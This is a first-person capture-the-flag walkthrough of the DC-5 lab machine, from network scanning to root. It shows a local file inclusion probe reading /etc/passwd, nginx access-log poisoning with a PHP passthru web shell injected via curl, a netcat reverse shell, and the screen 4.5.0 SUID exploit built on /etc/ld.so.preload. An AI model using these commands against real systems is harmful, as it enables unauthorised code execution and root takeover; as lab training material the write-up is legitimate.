Another day!!, another box today I am working on DC-5 and it was great learned some awesome attacks and something so simple as “When All You Can Do Is Read” pretty informative give this one a google search, to sum this up it’s just, what would we do when all we can do is read on a box? When we can’t list directories but we can call the famous “/etc/passwd” you do this one because it’s always called on CTF but when you are working on an assessment and you can’t list well you start calling file’s that you know that are supposed to be there! This box was awesome a lot of enumeration of course started with s normal web page but it is all full with gibberish here the most subtle hint we receive is that the Copyright string the year gets changed every time we refresh the page so from here we can tell there is something going up with the thankyou.php directory after tweaking we can tell that it’s vulnerable to LFI from here we inject code to posing the access log file and get Code Execution then we can continue with the privilege escalation another SUID called screen 4.5.0 that with a little coding and compilation we can use this to escalate to root
[dmcxblue@blackarch ~]$ sudo arp-scan -l Interface: enp0s3, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.1.1 a4:08:f5:53:18:56 (Unknown) 192.168.1.9 84:4b:f5:63:d7:74 Hon Hai Precision Ind. Co.,Ltd. 192.168.1.175 00:c0:ca:96:e7:91 ALFA, INC. 192.168.1.119 30:d9:d9:54:6f:e2 (Unknown) 192.168.1.232 08:00:27:f2:aa:e5 Cadmus Computer Systems 192.168.1.169 88:de:a9:3c:5b:0d Roku, Inc. 192.168.1.245 9c:ae:d3:ed:d2:7e Seiko Epson Corporation 14 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.5: 256 hosts scanned in 1.982 seconds (129.16 hosts/sec). 7 responded
From here we will continue with nmap Scan
[dmcxblue@blackarch ~]$ nmap -sT -p- --min-rate 5000 192.168.1.232 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-04 10:12 PDT Nmap scan report for dc-5 (192.168.1.232) Host is up (0.00027s latency). Not shown: 65532 closed ports PORT STATE SERVICE 80/tcp open http 111/tcp open rpcbind 34932/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 13.60 seconds
Nmap targeted port scan
[dmcxblue@blackarch DC-5]$ nmap -sC -sV -p80,111,34932 192.168.1.232 -oA nmap/DC5 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-04 10:14 PDT Nmap scan report for dc-5 (192.168.1.232) Host is up (0.00036s latency). PORT STATE SERVICE VERSION 80/tcp open http nginx 1.6.2 |_http-server-header: nginx/1.6.2 |_http-title: Welcome 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 34932/tcp status | 100024 1 35803/tcp6 status | 100024 1 42276/udp status |_ 100024 1 46377/udp6 status 34932/tcp open status 1 (RPC #100024) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.63 seconds
[dmcxblue@blackarch DC-5]$ gobuster -u http://192.168.1.232 -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o DC5-gobuster.log ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://192.168.1.232/ [+] Threads : 50 [+] Wordlist : /usr/share/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 200,204,301,302,307,403 [+] Extensions : php [+] Timeout : 10s ===================================================== 2019/09/04 10:19:36 Starting gobuster ===================================================== /index.php (Status: 200) /images (Status: 301) /contact.php (Status: 200) /faq.php (Status: 200) /solutions.php (Status: 200) /footer.php (Status: 200) /css (Status: 301) /about-us.php (Status: 200) /thankyou.php (Status: 200) ===================================================== 2019/09/04 10:20:26 Finished =====================================================
I proceeded to launch Burp-Suite for more detailed enumeration and testing since the webpage had nothing of interest just 2 php pages that were interactive the ‘contact.php’ and the thankyou.php
I moved onto poking around by intercepting the request with Burp and just adding special characters into the URL or any areas that I thought would make the web server crashes or give a response in any way with no success
Here I was using repeater to see if anything would crash or give a different response until I noticed that the Copyright footer would change years every time I refreshed it
After tinkering a couple times with the url I used the ?file=../../etc/passwd to test it for LFI and with a positive result from Burp Suite we get a response from the server.
After more research into this vulnerability there is an article showing step by step how to move from LFI to shell
Following these steps I will continue to get a shell
We see that we have access to the ‘access.log’ file so we will need to add php code into the logs and try an get code execution
We can use curl to inject the code in this step
[dmcxblue@blackarch ~]$ curl -i 'http://192.168.1.233/thankyou.php?file=<?php passthru($_GET['cmd']); ?>' HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Wed, 04 Sep 2019 19:14:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive
We can verify on our curl command that we get Code Execution
curl -i 'http://192.168.1.233/thankyou.php?file=/var/log/nginx/access.log&cmd=id'
Now to receive a shell
[dmcxblue@blackarch DC-5]$ ncat -lvnp 1234 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 192.168.1.233. Ncat: Connection from 192.168.1.233:35736. whoami www-data id uid=33(www-data) gid=33(www-data) groups=33(www-data) bash -i which python /usr/bin/python python -c 'import pty;pty.spawn("/bin/bash")'
Here we will use the LinEnum.sh Script as it will save us a huge amount of time in enumeration this does not mean that we shouldn’t manually be checking but this verifies at least common exploits or misconfigurations mainly for CTF
In our SUID one of them stand’s out as it is not a common one on a linux machine to be shown with it’s version
-e \e[00;31m[-] SUID files:\e[00m -rwsr-xr-x 1 root root 40168 May 18 2017 /bin/su -rwsr-xr-x 1 root root 40000 Mar 30 2015 /bin/mount -rwsr-xr-x 1 root root 27416 Mar 30 2015 /bin/umount -rwsr-xr-x 1 root root 1441352 Apr 19 23:48 /bin/screen-4.5.0 -rwsr-xr-x 1 root root 75376 May 18 2017 /usr/bin/gpasswd -rwsr-sr-x 1 root mail 89248 Nov 19 2017 /usr/bin/procmail -rwsr-sr-x 1 daemon daemon 55424 Sep 30 2014 /usr/bin/at -rwsr-xr-x 1 root root 54192 May 18 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 53616 May 18 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 39912 May 18 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 44464 May 18 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 464904 Mar 25 23:07 /usr/lib/openssh/ssh-keysign -rwsr-xr-- 1 root messagebus 294512 Nov 22 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
We verify in Exploit-DB that there is a local privilege escalation for this SUID there are plenty of resources on how to exploit this vulnerability I used this blog post to compile and run this exploit as sometimes it doesn’t run as-is so you will need to manually compile and make this one work.
Once done we can confirm our root shell
These are the files we will be needing and compiling on our Attacking Box
Compile: gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c gcc -o /tmp/rootshell /tmp/rootshell.c
Run by following these steps
We wills tart a python http server and send this to the victim box this has to be done after compiling in our own local machine
We will move our script.sh as-is so that the moment it runs it will execute all the needed steps to receive a root shell
dmcxblue@blackarch tmp]$ cat script.sh echo "[+] Now we create our /etc/ld.so.preload file..." cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell
Then we execute
And we will get the flag
This box was awesome really interesting way to approach it and receive a shell also Black Arch Linux incredible OS all great so many tools! More than 2000 was just browsing and wanted to try a few other pen-testing Boxes see what’s going on out there, remember people there are so many way’s to hack!
[Not being sponsored or any of that the OS is all open-source and the authors are doing this in there spare time do go check them out and this OS also might heavy 26GB but still awesome, a few tools outdated such as gobuster as I noticed and a little buggy with SQLMAP but still that’s something that can be fixed and not a major thing to stop using this incredible OS, oh and I still went GNOME with it Lol]